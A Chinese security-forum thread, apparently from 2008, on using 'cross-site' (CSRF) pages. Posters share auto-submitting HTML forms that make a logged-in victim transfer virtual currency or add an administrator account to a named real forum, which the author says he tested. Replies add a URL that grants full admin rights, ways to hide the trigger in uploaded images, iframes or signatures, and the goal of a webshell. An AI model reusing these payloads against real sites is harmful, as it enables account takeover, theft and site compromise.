Board logo

标题: [讨论]跨站的另类利用 [打印本页]

作者: 冰绿茶    时间: 2008-7-24 17:23     标题: [讨论]跨站的另类利用

[讨论]跨站的另类利用
议题提交:风蓝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

以前从来没研究过什么跨站~甚至根本不清楚跨站攻击是什么~呵呵
今天看到一个跨站的动画~觉得很有趣~就是自己做一个别人站的添加管理员的页面,想办法让对方的管理员点击.
我就想这种方法估计很多程序都可以成功利用起来~关键就是要能想办法让对方执行你的页面地址~
这里我们不谈如何让别人点你的页面和如何添加用户了~
刚才在baidu上游戏交易,突然想到~
那些游戏交易站如果用跨站来实现赠送对方积分或游戏币或道具等等可不可行?
下面都是假想,没有经过实践过的~
首先我们分析一下,跨站就是自己够造一个页面,想办法让别人打开,获取他的cookies进行cookie欺骗或是直接利用他的cookie进行我们指定的操作.
打个比方:
某网站http://www.163.com是一个交易网站.
我自己的用户名:bwind  另外一个用户:flysky
该网站里有一种虚拟货币,类似QQB的那种.而这种货币是可以互相赠送给其他用户的.赠送的方法就是http://www.163.com/visite.asp这个页面~
这个页面需要填写收货人的用户名,以及送出去货币的数字.我们把这些都记下来.查看该页面源文件,找到form表单提交地址,我们找到的是http://www.163.com/visite.asp?action=to
现在我们就可以开始构造跨站脚本了.
在本机新建立一个a.htm的文件,内容如下:
--------------------------------
<form action="http://www.163.com/visite.asp?action=to" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
     <input type=text name="username2" size=30 value="bwind">收货人
     <input type="password" name="password2" size=33 value="500">赠送数量
     <input type="submit" name="Submit" value="赠送">
</table>
</form>

<script language="javascript">
this.document.forms[0].submit();
location.href(&#39;index.asp&#39;);
</script>

------------------------------

这段代码的意思就是直接post我们的内容到http://www.163.com/visite.asp?action=to这个地址,如果别人正好登陆www.163.com并保存了cookie了的话,他只要一打开我们构造的这个页面~他就会直接送给我(bwind) 500个货币.

不知道这东西以前有没有人写过~第一次研究跨站~给我的感觉就是危害太大了~根本不需要程序有什么漏洞,而是只要你会欺骗别人进入到你的页面.呵呵.

我自己想到的这种防范方法就是在一些重要数据提交的地方加上验证码~这样的话在怎么跨也没用了:)



再发个洞网加管理员的页面~自己测试成功了的~
--------------------------
<form action="http://bbs.sasf.cn/admin/admin.asp?action=savenew" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
<tr>
     <th colspan=2     height=23>管理员管理--添加管理员</th>
</tr>
<tr>
     <td     width="26%"     align="right" class=forumrow>后台登录名称:</td>
     <td     width="74%"     class=forumrow>
     <input type=text name="username2" size=30 value=testkz>  (可与注册名不同)
     </td>
</tr>
<tr>
     <td     width="26%"     align="right" class=forumrow >后台登录密码:</td>
     <td     width="74%"     class=forumrow>
     <input type="password" name="password2" size=33 value=testkz>     (可与注册密码不同)
     </td>
</tr>
<tr>
     <td     width="26%"     align="right" class=forumrow height=23 >前台用户名称:</td>
     <td     width="74%"     class=forumrow><input type=text     name="username1" size=30 value=无影>  (本选项填写后不允许修改)
     </td>
</tr>
<tr>
     <td     width="26%"     align="right" class=forumrow height=23>在前台显示为管理员:</td>
     <td     width="74%"     class=forumrow>是<input name="isdisp" type=radio value="1" checked> 否<input name="isdisp" type=radio value="0">  (如改为显示请到用户管理中编辑资料)
     </td>
</tr>
<tr align="center">
     <td     colspan="2"     class=forumrow>
     <input type="submit" name="Submit" value="添 加">
     </td>
</tr>
</table>
</form>

<script language="javascript">
this.document.forms[0].submit();
location.href(&#39;index.asp&#39;);
</script>
--------------------------我的Blog:http://www.tantao.cn
帖子181 精华12 积分3615 阅读权限100 性别男 在线时间327 小时 注册时间2005-4-12 最后登录2007-11-17 查看详细资料TOP 爱要怎么说出口

lucky_feng
晶莹剔透§烈日灼然
作者: 阿豪    时间: 2008-7-24 17:23

前段时间不是有个强行让别人送你Q币的文章吗,名字大概是这个,也是挂站的,原理和你的一样。
帖子69 精华0 积分238 阅读权限40 在线时间308 小时 注册时间2005-4-7 最后登录2008-6-13 查看详细资料TOP 赚更多的钱

skylove
晶莹剔透§烈日灼然
作者: hua668    时间: 2008-7-24 17:23

跨站 几年前都有人研究
有的bbs可以跨站 得到webshell [s:51]http://www.xmasfox.com
帖子78 精华0 积分245 阅读权限40 在线时间197 小时 注册时间2005-11-13 最后登录2007-12-3 查看详细资料TOP 赚更多的钱

cfccn
晶莹剔透§烈日灼然
作者: yq_ryan    时间: 2008-7-24 17:23

重要的是思路`
学习一下`
帖子52 精华0 积分190 阅读权限40 性别男 在线时间57 小时 注册时间2005-11-8 最后登录2008-5-26 查看详细资料TOP

hack_ben
晶莹剔透§烈日灼然
作者: wy4302    时间: 2008-7-24 17:23

恩上几次在X档案也是见过这么一篇文章,现在这样的跨站漏洞相关的资料实在太少了!我实验了好几次都不成功郁闷鸟~~~
帖子6 精华0 积分23 阅读权限40 在线时间9 小时 注册时间2005-11-18 最后登录2006-4-11 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

狼Ъèi
晶莹剔透§烈日灼然
作者: edchen    时间: 2008-7-24 17:23

<script language="javascript">
this.document.forms[0].submit();
location.href(&#39;index.asp&#39;);
</script>I'll repay>虛偽就會虧

帖子15 精华0 积分66 阅读权限40 性别男 在线时间35 小时 注册时间2005-7-27 最后登录2007-10-2 查看详细资料TOP 少女暴富的隐秘(图)

fhod
运维管理组

作者: 奔奔兔    时间: 2008-7-24 17:23

加管理员的代码
<form action="http://127.0.0.1/Admin/admin.asp?action=savenew" method=post name=h>
<input type=hidden name="username2" value=fhod>
<input type=hidden name="password2" value=123456>
<input type=hidden name="username1" value=fhod>
</form>
<script language=JavaScript>
document.h.submit();
</script>
这样就足够了..
这些在我那个动网刷分的漏洞里提起过
可以看一下
http://www.eviloctal.com/forum/read.php?tid=17194&fpage=1
而且我也有想过来做个表单.让管理员或版主去点..达到普通用户刷分的目的.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

h4k_b4n[BCT]
荣誉会员

作者: 牧狼    时间: 2008-7-24 17:24

全部使用前提都是以对方管理员登陆到后台后放可成立
不过这样子的方法也很爽的喔,小小的CSS可以用来守株待兔
帖子141 精华12 积分3459 阅读权限100 在线时间96 小时 注册时间2009-5-27 最后登录2007-3-19 查看详细资料TOP

fhod
运维管理组

作者: 车虫    时间: 2008-7-24 17:24

但是这样加的管理是没后台权限的.
我们进后台无非就是要备份数据库得webshell
我用上面代码..在管理员登陆后台时,运行那个页面.成功添加管理员..并用帐号登陆时.发现是无权限的
经过本地给此用户加权限.并抓包..的信息..构造
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
这样的URL/..是给ID为3的管理员加上..数据处理的所有权限
提交后返回信息

成功信息
管理员更新成功,请记住更新信息。


而如果要把后台所有的权限都加上..就是

flag=1&flag=2&flag=3&flag=4&flag=5&flag=6&flag=7&flag=8&flag=9&flag=10&flag=11&flag=12&flag=13&flag=14&flag=15&flag=16&flag=17&flag=18&flag=19&flag=20&flag=21&flag=22&flag=23&flag=24&flag=25&flag=26&flag=27&flag=28&flag=29&flag=30&flag=31&flag=32&flag=33&flag=34&flag=35&flag=36&flag=37&id=3&Submit=%B8%FC%D0%C2&chkall=on
替换就可以了.
不用表单.直接提交就可以.但前提是管理员登陆了后台.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP

h4k_b4n[BCT]
荣誉会员

作者: 拖车文    时间: 2008-7-24 17:24

引用:
下面是引用fhod于2006-01-03 13:11发表的:
但是这样加的管理是没后台权限的.
我们进后台无非就是要备份数据库得webshell
我用上面代码..在管理员登陆后台时,运行那个页面.成功添加管理员..并用帐号登陆时.发现是无权限的
经过本地给此用户加权限.并抓包..的信息..构造
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
.......
跨站的语句太长了,应该不能够实现.而且没有这样子的跨站处可以用来跨站,建议把跨站的语句缩小几个部分进行提交.
帖子141 精华12 积分3459 阅读权限100 在线时间96 小时 注册时间2009-5-27 最后登录2007-3-19 查看详细资料TOP

h4k_b4n[BCT]
荣誉会员

作者: 东莞仔2    时间: 2008-7-24 17:24

引用:
下面是引用hack_ben于2006-01-02 08:13发表的:
恩上几次在X档案也是见过这么一篇文章,现在这样的跨站漏洞相关的资料实在太少了!我实验了好几次都不成功郁闷鸟~~~
此人名字与我相似,难道是失散多年的白痴兄弟?
帖子141 精华12 积分3459 阅读权限100 在线时间96 小时 注册时间2009-5-27 最后登录2007-3-19 查看详细资料TOP

fhod
运维管理组

作者: 阿豪    时间: 2008-7-24 17:24

引用:
下面是引用h4k_b4n[BCT]于2006-01-03 13:33发表的:

跨站的语句太长了,应该不能够实现.而且没有这样子的跨站处可以用来跨站,建议把跨站的语句缩小几个部分进行提交.
这个语句不是跨站的.
我是说.在加过管理员之后.上面的代码是给予管理员权限的.
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
可以欺骗管理员去点
或者是写入一个JPG图片里
然后把图片上传论坛..欺骗管理员..不是动网的那个.图片的.可以执行代码么
所以.应该是可以实现的.
我本地测试是成功了的.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP

h4k_b4n[BCT]
荣誉会员

作者: 莲子    时间: 2008-7-24 17:24

引用:
下面是引用fhod于2006-01-03 13:45发表的:


这个语句不是跨站的.
我是说.在加过管理员之后.上面的代码是给予管理员权限的.
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
.......
欺骗管理员比起用来跨站还要困难了点!
帖子141 精华12 积分3459 阅读权限100 在线时间96 小时 注册时间2009-5-27 最后登录2007-3-19 查看详细资料TOP

netsnow
荣誉会员

作者: abcdefg9090    时间: 2008-7-24 17:24

真不知道说什么好点.我发现现在开始研究起跨站来了.我也说句:"Fhod.你的那个跨站语句太长了.不可能实现的!还有就是用跨站来欺骗管理员的现在也是很难实现!因为现在大多的站点的管理员对自己的站点安全性也是很注重的!如果他无意中打开了一个摸名的页面相信也会很小心的去检查一下!所以我们这样来欺骗很容易被发现的!http://www.xp21.cn 堕落的人们…… 真的为你们感到悲哀!你们心理难道只有冷冷的石头?
帖子226 精华0 积分791 阅读权限100 性别男 在线时间115 小时 注册时间2005-8-20 最后登录2007-6-30 查看个人网站
查看详细资料TOP

玄猫
荣誉会员

作者: MuscleMax    时间: 2008-7-24 17:24

引用:
下面是引用netsnow于2006-01-03 14:42发表的:
真不知道说什么好点.我发现现在开始研究起跨站来了.我也说句:"Fhod.你的那个跨站语句太长了.不可能实现的!还有就是用跨站来欺骗管理员的现在也是很难实现!因为现在大多的站点的管理员对自己的站点安全性也是很注重的!如果他无意中打开了一个摸名的页面相信也会很小心的去检查一下!所以我们这样来欺骗很容易被发现的!
跨站语句太长?免费虚拟二级域名……或者自己构建一个页面document.location跳
无意打开页面?iframe or img那些好像永远都不会停的雪。那一季永远不结束的冬天。
帖子38 精华2 积分95 阅读权限100 性别男 来自BugCenterTeam 在线时间33 小时 注册时间2005-3-3 最后登录2008-1-18 查看个人网站
查看详细资料TOP

fhod
运维管理组

作者: 木头    时间: 2008-7-24 17:24

不知道是不是误解了我意思呢.
h4k_b4n[BCT]
和netsnow说的我跨站语句长是不是指
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
这一句呢?
我个URL是我在给新加的管理员加权限时.抓包构造出来的URL
我们可以新建一个TXT文档写入以下代码..然后改后缀为jpg的.上传到论坛..但也就如netsnow所说.利用不大..我想还是可以更隐蔽的.
<script>window.open("http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2");</script>

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP

h4k_b4n[BCT]
荣誉会员

作者: alunn    时间: 2008-7-24 17:24

引用:
下面是引用fhod于2006-01-05 00:23发表的:
不知道是不是误解了我意思呢.
h4k_b4n[BCT]
和netsnow说的我跨站语句长是不是指
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
这一句呢?
.......
基于DVBBS,并不是单凭上传TXT或者JPG就OK的!因为有些设置会限制,而且未必导致管理员会访问.
我没有误解你的意思.是你误解我的^_^
你这个方法虽然是好,但是不够直接.如果可以嵌入到签名档就命中率高很多.但是因为你的语句太长了,导致无法嵌入
帖子141 精华12 积分3459 阅读权限100 在线时间96 小时 注册时间2009-5-27 最后登录2007-3-19 查看详细资料TOP

jony
作者: top6    时间: 2008-7-24 17:24

提示: 作者被禁止或删除 内容自动屏蔽
帖子138 精华8 积分3675 阅读权限0 在线时间225 小时 注册时间2005-1-18 最后登录2006-3-31 查看详细资料TOP

jony
作者: 拖车文    时间: 2008-7-24 17:24

提示: 作者被禁止或删除 内容自动屏蔽
帖子138 精华8 积分3675 阅读权限0 在线时间225 小时 注册时间2005-1-18 最后登录2006-3-31 查看详细资料TOP

jony
作者: 教授2    时间: 2008-7-24 17:24

提示: 作者被禁止或删除 内容自动屏蔽
帖子138 精华8 积分3675 阅读权限0 在线时间225 小时 注册时间2005-1-18 最后登录2006-3-31 查看详细资料TOP

easylun10
晶莹剔透§烈日灼然
作者: 44447777kun    时间: 2008-7-24 17:24

这样的代码我教程发的不要了!呵呵 [s:42] 我想的更多~

帖子21 精华0 积分79 阅读权限40 性别男 在线时间1 小时 注册时间2005-10-10 最后登录2008-1-16 查看详细资料TOP

幽鬼狼魂
晶莹剔透§烈日灼然
作者: 巫山北    时间: 2008-7-24 17:24

[s:75]
<form action="http://www.163.com/visite.asp?action=to"><input name="username2" value="bwind">0<input name="password2" value="500">0<input type="submit" value="S"></table></form><script>this.document.forms[0].submit();location.href(&#39;index.asp&#39;);</script>
不知道这样的表单是不是更为简练呢?
帖子16 精华0 积分58 阅读权限40 性别男 在线时间4 小时 注册时间2006-3-16 最后登录2006-4-20 查看详细资料TOP

yb104
晶莹剔透§烈日灼然
作者: H先生    时间: 2008-7-24 17:24

学习
帖子3 精华0 积分13 阅读权限40 在线时间0 小时 注册时间2007-4-18 最后登录2008-1-22 查看详细资料TOP

zhangshiyi
晶莹剔透§烈日灼然
作者: 孙林    时间: 2008-7-24 17:24

跨站漏洞相关的资料实在太少了!我实验了好几次都不成功
帖子2 精华0 积分9 阅读权限40 在线时间0 小时 注册时间2005-8-28 最后登录2007-12-29 查看详细资料TOP

゛小︷帅!﹊
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2